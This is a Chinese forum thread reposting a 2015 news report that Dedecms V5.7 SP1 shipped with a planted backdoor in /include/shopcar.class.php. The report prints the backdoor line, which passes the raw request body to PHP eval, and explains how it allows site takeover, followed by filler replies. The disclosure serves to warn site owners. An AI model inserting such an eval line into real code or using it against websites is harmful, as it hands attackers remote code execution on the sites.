关灯
开启左侧

[dedecms] Dedecms被曝疑似植入后门 可成功控制网站

[复制链接]
kjeittccdf 发表于 2015-3-30 15:29:10 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
 
站长之家(Chinaz.com)3月21日报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7  SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。

Dedecms被曝植入后门代码

Dedecms被曝植入后门代码

Dedecms被曝植入后门(站长之家配图)

据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18  19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。
据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。
Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。
 

精彩评论13

正序浏览
wwzcdenleclv 发表于 2015-11-30 19:41:55 | 显示全部楼层
 
疯了 这年头盗版还真多~~~~~~
 
Acropozelan 发表于 2015-11-30 19:42:36 | 显示全部楼层
 
本人在此留言均为网络上复制,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能。并不代表本人局部或全部同意、支持或者反对楼主观点。
 
wwzcdenleclv 发表于 2015-11-30 19:42:40 | 显示全部楼层
 
都看了,这帖子有意思。
 
wwzcdenleclv 发表于 2015-11-30 19:43:21 | 显示全部楼层
 
挨骂也是幸福~~~
 
wwzcdenleclv 发表于 2015-11-30 19:43:31 | 显示全部楼层
 
我的我的 忘记了 呵呵
 
Acropozelan 发表于 2016-1-26 21:23:48 | 显示全部楼层
 
哈哈~` 你好有意思哦~
 
mwxny 发表于 2016-1-26 21:24:05 | 显示全部楼层
 
我又回复了
 
tohme 发表于 2016-1-26 21:24:09 | 显示全部楼层
 
看到本ID的这位童鞋,我看你气度不凡,谈吐间隐隐有王者之气,日后必有一番作为! 内有“加关注”三字,你就顺手把它点了吧。相得准,我分文不收;相不准,你也好回来找我。
 
Acropozelan 发表于 2016-1-26 21:24:52 | 显示全部楼层
 
…没我说话的余地…飘走
 
gevaemaidovef 发表于 2017-4-10 22:22:06 | 显示全部楼层
 
哈哈 瞧你说的~~~
 
alapScady 发表于 2017-4-10 22:24:56 | 显示全部楼层
 
呵呵,等着就等着....
 
bqtklouu 发表于 2017-4-10 22:25:28 | 显示全部楼层
 
苍天之下,厚土之上,竟有如此奇人异士、文人墨客!讥讽于谈笑间,笑骂于无形中,层次之高,境界之深,非我等所能匹及,偶像啊!
 
Mqokjdvq 发表于 2017-4-10 22:25:59 | 显示全部楼层
 
这是怎么了啊??
 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


0关注

1粉丝

392帖子

热门图文
热门帖子
排行榜
作者专栏

关注我们:微信订阅号

官方微信

APP下载

全国服务Q Q:

956130084

中国·湖北

Email:956130084@qq.com

Copyright   ©2015-2022  站长技术交流论坛|互联网技术交流平台Powered by©Discuz!技术支持:得知网络  

鄂公网安备 42018502006730号

  ( 鄂ICP备15006301号-5 )